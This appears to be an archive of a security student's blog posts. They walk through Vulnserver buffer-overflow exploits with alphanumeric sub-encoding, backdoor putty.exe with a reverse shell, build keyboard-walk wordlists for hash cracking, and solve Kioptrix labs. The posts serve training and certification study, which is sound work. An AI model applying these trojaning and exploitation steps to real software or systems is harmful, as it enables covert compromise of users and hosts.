Why do you need NOPs?

I’ve read a lot of things and taken both the OSCP and OSCE courses, yet I’ve never seen anyone really break out why we use NOPsleds. There are instances where they are used to line up shellcode to a particular offset, which is self-explanatory. However, there are cases where an exploit won’t work without them. Why is that?

Looking at the TRUN command in Vulnserver, it’s a relatively easy exploit. We begin crafting our overflow string, this time with no NOPs. We already established the EIP offset is 2003, and we’re using reverse shell shellcode generated by msfvenom. The only bad character identified is \x00, we we encode with the default x86/shikata_ga_nai encoder and specify the bad character. POC code for the exploit is available here.

No NOPs this time

In this instance, we are using the JMP ESP instruction located at 0x62501205 to jump to our shellcode. Before sending the exploit, ensure a breakpoint is set at this address. We send the exploit and step through it in the debugger. Take the jump to ESP and we see, we are properly lined up.

Sitting at ESP…

If we move forward one instruction at a time, the program crashes and shellcode does not execute. If we’re paying attention, we will see that part of our shellcode was overwritten with some weird instructions.

RET instruction is gone, shellcode overwritten…

So, back to the drawing board. Modify the string to add the nops in, and let’s look at execution.

NOPsled in place…

At this point we can see our shellcode at the end of the NOPs. If we continue execution, we will receive a shell. But at this point it’s important to step back and understand the process here.

Shellcode begins…

Starting at 0x00b7fa24 we see our shellcode, but what we actually see if the msfvenom decoding stub. The important part to note is the instruction at 0x00b7fa2b: FSTENV (28-Byte) PTR SS:[ESP-C]. Floating point instructions are used for placing EIP on the stack, which is useful for all sorts of reasons but for our purposes here in order to perform relative calculations for the decoder to work. If we advance execution to 0x00b7fa2f (but don’t execute this instruction) we can see this play out.

Did not crash this time…

So we use FXCH to manipulate the floating point registers and put the value of EIP into an FPU register. Then we execute the FSTENV (28-BYTE) PTR SS:[ESP-c] instruction, which dumps the floating point environment into memory. It dumps 28 bytes of data starting at ESP-C, which in this case would be 0x00b7fa00. If we look at the stack, the memory address that FXCH instruction was performed at is now at the top of the stack. The next instruction will pop this value into EBX, and now EBX will be used by the decoder for relative calculations. At this point, if we press F9 to continue execution (in Immunity…)

It works!

I find this very interesting to see in action. I happened on information about how these instructions worked when dealing with a stack alignment problem in another exploit. Understanding how the decoder worked could have saved me some time.

Vulnserver: LTER SEH Buffer Overflow

Vulnserver is an intentionally vulnerable application used for training exploit development. It consists of several commands, some vulnerable and some not, and the the user is intended to find and exploit these vulnerabilities. For many specific vulnerabilities, there are several ways to exploit them. In my preparation for the OSCE exam, I was able to find and exploit each command in turn. However, it wasn’t until reviewing the infamous HP NNM 7.5.1 exploit that I was able to exploit the LTER command in Vulnserver by overflowing the SEH address.

To start we find the crash. I used boofuzz for this, using a template found out on this blog site. The crash should occur fairly quickly.

boofuzz template for vulnserver

After fuzzing we replicate the crash manually by sending a metasploit pattern to identify the offset. We get the “LTER /.:/” prepend string from the fuzz results.

Sending a pattern of 5000 bytes

Ensure the application is open and attached to a debugger on the target machine. The application has crashed and we can see the MSF pattern overwriting several locations in memory. Inspecting the SEH chain shows us the SEH pointer is overwritten. Querying these values in the pattern_offset utility in MSF returns an offset of 3495 for NSEH, 3499 for SEH. Note, the offset for NSEH on Windows 2003 will be 3491, on Windows Vista it will be 3515. By sending a shorter buffer, you can overwrite EIP directly instead of overwriting the SEH pointer. This can be a useful exercise for dealing with character restrictions in a simpler problem.

SEH pointer is overwritten

Further testing shows that we have 28 bytes following SEH to test bad characters manually. While testing, we send the below string:

testing bad characters…

And we find some strange results:

Everything after 7F is mangled…

It wasn’t until doing the OSCE course that I really recognized what was happening here and some of the additional options I have here. The characters after 7F are being mangled, but testing reveals that they are being mangled in a predictable way, basically subtracting 7F from any value greater than 7F. The end result is that we are left with a more or less alpha-numeric character set to work with.

The next step is to identify a “pop pop ret” pointer in the essfunc.dll module that consists of allowed characters. We can use mona or findjmp.exe in order to find this address, or just search immunity for “pop r32 pop r32 ret” but this is the least readable of the three options. We add this address into our attack string at the SEH location.

pop pop ret found at 0x6250120b in essfunc.dll

We need more space to work with, 28 bytes is not enough to function with even without character restrictions. We can take a backwards jump, with a couple of modifications. For a normal backwards jump, we would use the opcodes eb XX, where XX is equal to the number of bytes we want to jump, minus 1, subtracted from 255 and converted to hex. So if we want to jump back 64 bytes we would use c0, 128 bytes would be 80. We can’t use either of these but if we use FF it will be converted to 80 when vulnserver.exe does it’s alpha-numeric conversion. Instead of using eb for a short jump, we can use 77 for a conditional short jump. This jump relies on the zero flag and the carry flag being unset. We can ensure they are set to zero by putting an operation in front of them, such as \x42 which translates to INC EDX. It would take a very unlikely set of circumstances for INC EDX to lead to the zero flag and carry flag being set.

Backwards alphanumeric jump

We set nseh equal to “\x42\x77\xff\x42” and add it to the attack string. If we send this string and follow it in the debugger, then take the jump, we arrive at about 127 bytes of code we can use.

Jump back into the buffer, giving us some breathing room…

Now that we have more space, we can sub-encode values. Sub encoding uses alpha-numeric values and SUB instructions to put specific values we need on the stack. As an example, we will take the value 0xe7ffe775 and sub encode it. First, subtract the value from 0xffffffff and then add 1. We get the value 1800188b. We can then break the bytes out into a table, as seen below. We must ensure that the values we pick add up to our bytes in the left column, but also that they are not in the list of bad characters for the application.

Table for manual sub encoding

To break this down, if we first zero out EAX, we can then perform these instructions (SUB EAX, 15521542; SUB EAX,015e0208; SUB EAX, 01500141) and then EAX will contain the value e7ffe775. Push this value on the stack, and now we have our decoded instructions on the stack. There are calculators online for doing this kind of encoding but it’s a good exercise to do it manually and learn how it is done.

My objective here was to jump all the way back to the beginning of the buffer so that I have 3000+ bytes to work with. The first thing we need to do is align the stack in our current buffer area. To do this we increase ESP by 1188 in order to place ESP right at the end of our current buffer. So whatever we push onto the stack will get executed. To do this, we push the value of ESP onto the stack, we pop it into EAX, we adjust it using sub encoding, and then we push the value of EAX onto the stack and pop it into ESP. Now, our stack is located at the end of our current buffer segment.

Sub encoded stack adjustment

From here, we want to jump backwards from the location of our stack to the beginning of our buffer. We do the math and see that we need to jump back 0xdb9, we would normally perform a near jump to FFFFF264, opcodes would translate to E9 64F2FFFF due to endianess. We will have to write this as two instructions on the stack to account for the uneven number of bytes, since we can only write 4 bytes at a time. We must zero out the EAX register before sub encoding instructions. We want to sub encode the values 64F2FFFF and E9414141 and push them on the stack in that order.

Sub encoding a near jump back to the beginning of our buffer

In this instance, I am using the same method muts used in the NNM exploit to zero out EAX. There are other methods, the one I normally like is pushing 41414141 onto the stack, popping it into EAX, and then XORing EAX with 41414141 again. If we execute these instruction, we see our jump get revealed at our stack location.

We’re jumping back and…

And now we are back at the beginning of the buffer and have a ton of buffer space for code execution. We’re actually 8 bytes into our buffer here, which is important to note for keeping our attack string aligned.

Now we’re at 00b7f23c

Now we have plenty of space. Msfvenom can generate alpha-numeric shellcode, so at this point we’re home free. Or almost. There are two other factors to consider. The first is that msfvenom-generated alpha-numeric shellcode is prepended by a non-alpha-numeric stub which sets the shellcode location in order to to operations relative to the start of the shellcode. This is a problem in this case. Offsec is nice enough to document the BufferRegister feature of msfvenom, which sets your buffer to a particular register. In order for this to work, we need to line up a register with our shellcode. So we adjust ESP using the same method as before and we can see below that our stack now lines up with our buffer, so the BufferRegister setting in msfvenom will work, our shellcode is waiting for us about 900 bytes and change away, and we should have a shell.

Lined up buffer.

You’ll note that this doesn’t work, and this is due to stack alignment. The stack must be aligned to a DWORD in x86 processors, which means that the memory address must be divisible by 4. Since ESP has been set to a place not evenly divisible by 4, instructions get confused and execution just gets messed up. So we adjust the stack to a location divisible by 4 and ensure we adjust all of our padding as well, and that’s it.

Adjusted shellcode

And…

It works.

I have the working code posted here. It should be noted that I chose ESP, but you can use any register, I believe

Backdooring Portable Executables: Code Caves and threading failure

To start off, let’s take care of the issue with the code cave. We don’t want to add another section to the PE, we want to modify the executable as little as possible to prevent possible detection. We can use the Memory Map tool in Immunity Debugger to manually review the sections for large, uninterrupted spaces of nulls. This blog shows a pretty succinct process for backdooring executables (and is my primary source for the next portion on threading) and introduces a tool called Cminer. Using Cminer on putty.exe, we find two potential caves:

Using Cminer to locate code caves in putty.exe of 350 bytes or more

These are actually rather small at 500ish bytes a piece, and may not work for encoded shellcode, requiring a jump from one cave to the other. But for unencoded shellcode, we are looking at about 350 bytes so this is plenty of space. Also note, manual inspection of the memory space will show that there is a ton more null space in the .xdata segment, it does not end with 0x4b8800. Whether this is some kind of issue with the tool or user error, I’m not sure. The good news is that if needed we can fit plenty of encoded shellcode in there. The bad news, I tested several different open source tools and none really provided reliable results. In fact, manual inspection revealed huge portions of null space in every section in the putty.exe PE, so, yeah I don’t know, probably a rabbit hole that it would be good to go down eventually and figure out how to accurately do this using automation. For right now, manual inspection is needed but Cminer did accurately provide two code cave locations so there is that. It should be noted that even though there are huge areas of null space, trying to overwrite some of those areas will cause the debugger to complain, so it’s a trial and error thing to find a suitable area.

So uhhh… about that nullspace ending at 0x004b8800…

From here it proceeds the same as with the previous example. Step into the code cave, save the program state, place the shellcode (this time generated using msfvenom with EXITFUNC=seh), adjust the stack, and close it out by loading the saved program state from the stack and proceeding with program execution.

For threading, I used a few different resources, the most easy to read was here, but was not successful. OSCE course starts in two days so I’m not going to spend anymore time on it, I’m close but it’s not quite working out.

Backdooring Portable Executables: Fixing execution

The best part of writing things down here is that inevitably 5 minutes later, I find someone with the same problem. When backdooring putty.exe, I came across an issue with the EXITFUNC code appended onto the end of msfvenom code. The code ends with a CALL EBP, which goes off into the shellcode and eventually to ntdll.KiFastSystemCallRet where it terminates the program.

We got a shell, but the program terminates here…

Not ideal. So one solution was to change that CALL EBP instruction to NOPs. Skipping that call allows execution to proceed, everything is right with the world, except the gnawing feeling that it’s just gross.

so dirty…

But hey, it works. Turns out though, Capt Meelo had the same issue and came up with a couple of solutions. His first solution was the same as the one up here, turn that CALL instruction into NOPs and the program executes as expected. Kind of reassuring to see that someone came up with the same fix, even if it’s not ideal. But his second solution was kind of a head-slapper moment. Just create the shellcode using the EXITFUNC=seh option:

generating shellcode

A closer inspection of the shellcode reveals they’re identical, as you’d expect since looking at the metasploit github shows you that EXITFUNC is determined by code tacked on to the end of the shellcode. The real difference is in a value moved into EBX at 0x004c3127 shown below.

Left: EXITFUNC=seh Right: EXITFUNC=none

So, lesson learned. If there’s an issue with a particular part of the shellcode, maybe try all the options associated with that shellcode first before manually NOPing out instructions. Using EXITFUNC=seh resumes execution like a charm. There is one remaining issue, though. Putting simple shellcode like popping calc will always work, but in the case of a reverse shell we find that the program does not execute unless a listener is configured on the correct port. This is not ideal. So on the agenda: redirecting to existing null space int he code rather than adding a section and fixing the last remaining execution issue.

Backdooring Portable Executables

Prepping for OSCE, lots of shellcoding and debugging going on. Shellcoding is particularly frustrating today so to change gears for a bit I’m going to write up backdooring PEs. Examples are x86, tested on Windows XP SP3, using the x86 putty executable available here. I also used Stud_PE, Immunity Debugger, and a great blog post over at Sector876 that helped me get the basics down. There’s a couple of different methods, let’s start with the first, we’ll add a section.

First, let’s start by opening the program in Stud_PE. Select the Sections tab and you can see all of the sections present in the executable. Right click and choose “New Section” and adjust the size. Ensure you’ve added enough space to fit your shellcode in, and select the option to fill the space with null bytes. After you save, run the executable to ensure it still functions and nothing is broken.

adding a section with Stud_PE

Open the executable in the debugger and inspect the sections, in Immunity this is easily found in the Memory Map tab. If you inspect the section, you should find it filled with null bytes. Note the memory address that the section starts at, in this instance we see 0x004c3000.

our new section, all filled with nulls

We will need to redirect program execution to this address, where we will eventually put shellcode. For now, note the existing instructions at the program’s entry point. We will need these for redirecting back to normal execution for the program.

our initial instructions

After saving these addresses, it is time to redirect execution. In Immunity we do this by right clicking the instruction and selecting Assemble, then inputting our jump instruction. We want to jump to 0x004c3000 in this case.

assembling our jmp instruction

After assembling the instruction should update in the debugger to exactly what we need.

jmp to…

Hit F7 in Immunity to move to the next instruction and you should see the new section we added, filled with nulls.

nulls, nulls everywhere

The first thing that should be done at this point is to save the executable. After saving, in the new section overwrite the first two instructions with PUSHAD and PUSHFD instructions. This saves the program state before we pass it our shellcode. Press F7 twice to move ahead and then note the location of ESP. We will need this location after the shellcode to adjust the stack prior to normal program execution. In this instance, ESP is at 0x0012FFA0 following the two instructions added.

ready for shellcode now

Use msfvenom to create shellcode. In this instance we’re creating a reverse tcp shell for Windows in hex format, no bad chars specified. In Immunity, this is placed in the executable by selecting enough memory locations to hold our shellcode starting with the instruction following the PUSHFD, then right clicking and performing a binary paste.

generating shellcode

Once the shellcode is pasted in, place a breakpoint on the last instruction of the shellcode and press F9 to continue execution. Note that if the shellcode is a reverse shell, unless you have a listener set up it will take execution off into an exception, and that you’ll have to close the listener to hit your breakpoint. Once at the breakpoint, note the address at ESP. In this case it is 0x0012fd9c.

ESP location after shellcode execution

The determine the ESP offset, we subtract the initial ESP value from the ending value, so 12ffa0 – 12fd9c, and our offset is 0x204. in order to get ESP back where it belongs for normal program execution, we need to add 0x204 to ESP, so we right click the instruction immediately following the shellcode and input ADD ESP, 0x204. The next two instructions should be POPFD followed by POPAD to resume the program’s saved state from before the shellcode.

Perfect! Or was it…

At this point, it doesn’t work. You get your shell, the program doesn’t open, you close your shell, the program crashes. Frustrating. What we want is for the program to open and for you to get your shell at the same time. And for it to not crash when we close out of our shell. First things first. The opening issue has already been solved for us.

The offending code

So we found it. It’s near the bottom, in the blog linked above he links to the metasploit github where you can find it for yourself. So we update it…

Easy enough

Still not quite right though, normal program execution doesn’t happen. Over at the metasploit github page, you can view the code for the exitfunc portion. This code is appended to the end of your msfvenom-generated code even if you choose EXITFUNC=none, right at the end. Check out this part is particular:

very last line of your shellcode

If you trace it in the debugger, your shellcode calls EBP which takes it off back into the shellcode and eventually out into ntdll.KiFastSystemCallRet which… ok, turning into a rabbit hole. Researching this, figuring out why it is doing this, is a priority. But for right now, quick and dirty, oh so dirty, just overwrite that call with NOPs and it works.

this is a gross solution and I should feel bad…

On the agenda is creating a backdoor using existing null space within the application and figuring out this business with the EXITFUNC in msfvenom.

program’s running…
shell’s working… it’s still gross though

kwprocessor and princeprocessor

I ran across this tool while doing Rastalabs. It’s kwprocessor, designed to help build keyboard walks for wordlists. It is actually pretty easy to use and can produce some quality wordlists for keywalks, and given how common those are in the operational environment it’s a good tool to have.

Installation is easy, just run “make”. In order to build for a Windows environment, ensure mingw-w64 is installed and run “make windows”. This will produce both 32 and 64 bit executables for Windows. I didn’t have much luck using the Windows version, the output was not what you would expect. I suspect this is due to formatting issues of the inputs to kwp (discussed below) but did not test that.

The help function is available using the –help flag, and it shows you how to format the command and manipulate the output. There are two basic options in the help: keyboard and keywalk. The keyboard options specify which characters will be included. The keywalk options specify the directions the keywalks will be generated in.

The default values are specified on the right, and for the boolean values (the keyboards and keywalks) anything with a 1 is run by default. By default the command outputs to STDOUT, so you can redirect the output to a file if you are looking to add to an existing file rather than create one from scratch. Changes to the defaults must be specified individually, so a typical command might look like this:

./kwp -s 1 -3 1 -4 0 -7 1 -9 1 basechars/full.base keymaps/en-us.keymap routes/4-to-4-exhaustive-route -o /opt/test_wordlists/list1.txt

There are three required parameters for running kwp: basechars, keymap, and route. Basechars are just that, the base characters that the keyboard walk will start from. There are two built-in options: full.base and tiny.base.  The tiny base seems extremely small, but given how often passwords comprised of keyboard walks begin with these characters it is easy to see how it would be effective.

Several different keymaps are provided. Keymaps are files containing maps of locations of keys on language-specific keyboard layouts. A few common languages are given, but the format is simple enough that if necessary it could be changed. The keymap is the foundation that the list is built from, so choosing the correct keymap is critical.

Routes are the last, maybe most important, parameter to pass the command. Atom, the creator of kwprocessor, breaks routes down better than I ever could in the github readme. An important note on routes is that the two largest routes, 2-to-16-max-4-direction-changes.route and 2-to-32-max-5-direction-changes.route, don’t work for me on Linux. On Windows I was able to get the routes to work, however the previously mentioned formatting issues rendered the wordlist unusable. I think some troubleshooting could solve the format issue, but it isn’t necessary.

A good strategy for best using the tool is not to create the largest wordlist possible, but rather to create smaller wordlists and combinate them into larger wordlists. A real world example of a keyboard walk I have seen is 1qaz@WSX. This is a fairly simple password actually, but is the kind of thing administrators would use to be easily remembered and meet all the password complexity requirements. Creating a list that would contain this password would probably be enormous and tricky to generate, and requires jumps. Better to create lists of smaller words that can be more easily combined. I started by creating a custom basechars file to ensure that I am only starting from the left side of the keyboard.

Next I created a wordlist that would include all the four character walks from the left side of the keyboard that make sense. To me anyway and based on my experience, there’snot much science behind my process here.

My objective is to get the smallest possible wordlist to ensure that the list remains usable with a combinator. I have some results here from several different passes through kwprocessor in order to minimize the list and finally sorted to remove any duplicates.

Atom has another tool, princeprocessor, which can help to combine words. This is something I’m still working on, and princeprocessor takes some trial and error to avoid making enormous wordlists. But I was able to make it work and generate a wordlist of eight character keywalks which would include keywalks not easily generated by kwprocessor due to the key jumps.

This created a list that had our example password above, but also wasn’t small enough that we would be able to work with it on fairly limited hardware.

This is only a start. My objective is to use these tools to be able to generate on the fly 16 character keyboard walks that can be used on mid-range hardware to crack admin hashes. The problem is that the possible number of combinations goes up so quickly that it would make this very difficult for large wordlists. You can see the keyspace in princeprocessor for yourself prior to running the tool.

The next steps are to further reduce the size of the initial wordlist, take out uncommon or unlikely characters, take out words that wouldn’t meet common password complexity requirements. This is an ongoing project but one that I feel will ultimately be worthwhile on red team missions. The more refined I can get the initial list, the better the end product will be.

Um

Things got so busy I forgot I had this, luckily I remembered when I had a bunch of stuff I need to write down somewhere accessible. How fortunate.

OSCP – Day Zero

Today is the day, I just received all my materials and am setting everything up. I should be able to get at least a couple of productive hours in tonight and then another few tomorrow.

My goal is, win or lose, to look back and see how I could have prepared better and apply that to the next milestone. I know that, of course, I could have done more, but I feel like I did ok for preparation right now. My overriding mantra was not to sweat it too much. I know enough about the OSCP coursework that I know it will walk me through some of the things I know I had some difficulty with, like exploit development and web stuff. But I also geared my prep to hit some of those areas. I went over several exercises in developing buffer overflow exploits. I went through the Kioptrix series (among others) from Vulnhub.com and focused on the SQLi in particular. I hit the Pentesterlab.com web penetration testing exercises and broke down the mechanics, the way I like to learn.

So I’m cautiously optimistic. Let’s see how I feel in a few weeks. I’ve been reading a lot lately focused more on how to learn rather than what to learn. I just discovered the Slack channels over at NetSec Focus and immediately got some good advice about not focusing on the number of roots/day or any kind of metric like that, but understanding the practice and the mechanics of the service/attack.

Let’s see how it goes.

Kioptrix 3 – 3 Ways to Win

This one is great. More web stuff. More of me failing at SQL injection. It’s worth failing to learn, though. I keep making progress via exploits and tools, but I need to get stronger on these more basic concepts.

The entire challenge hinges on getting one of two user account passwords. Looking at the webpages and seeing the LotusCMS software, my first instinct was to look for a vulnerability for that. And I found a couple, but this one worked: https://github.com/Hood3dRob1n/LotusCMS-Exploit.  So that works and gets a shell with the www-data account, which isn’t much. There are a couple of exploits listed for the Linux kernel that should have escalated privs, but they didn’t work. So I tried doing grep -rn “password”, which worked on one of the SANS Holiday Hack challenges. Sure enough, hard-coded mysql password.

There are three ways, that I know of, to get the user creds. First is the method I used, which is to used the LotusCMS exploit then find the hardcoded MySQL password and then go to kioptrix3.com/phpmyadmin/index.php and logging in there. From there, you can get the user credentials for loneferret and dreg. You can also use SQL injection on the parameters from the gallery on the main site and get the cred that way, or use sqlmap to get the creds.

Once in, you can sudo to use the ht text editor as root, which allows you to edit the sudoers file. Clever. I liked seeing multiple paths to victory here, even if I only saw them all after the fact. Now on to Kioptrix 4, which is quite a bit harder for me.

Kioptrix 2 – Lessons Learned

Rather than do a traditional walkthrough on most of these, I think I’ll just do a “lessons learned” type thing. That’s more useful for me, and honestly, the world doesn’t need another Kioptrix walkthrough.

So with the first one I feel like I was pretty much successful. I took a generic pentesting methodology and applied using the specific tools I had and it worked out well. With this one, things were a bit more tricky.

Mistake one: I didn’t use anything to enumerate out web pages on the site. So I spun my wheels on the services detected through nmap for much longer than I should have rather than just looking at the index.php page. One look and it becomes pretty clear that the entry point of this VM does not lie in analysis of tool feedback and research of vulnerabilities associated with software. A little SQL injection and you’re in, and given a prompt that runs the ping command. I was able to set up a reverse shell and now we’re in the box as the apache user. This is where the research comes in and reveals a privilege escalation vulnerability for the linux kernel.

Mistake two: I missed the hardcoded credentials in the index.php source code. If the objective is just to own the box, well that’s not of too much consequence. But the objective here is really just to get as much info as possible and missing that bit of data is instructive for the future.

So far, my objective has been to stay away from Metasploit and see what I can do manually and it has been working out. These haven’t been challenging but there are inefficiencies and things I miss so I need to shore that up. I’m making a playbook for these machines and making some adjustments based on my results. Next up: Kioptrix 3.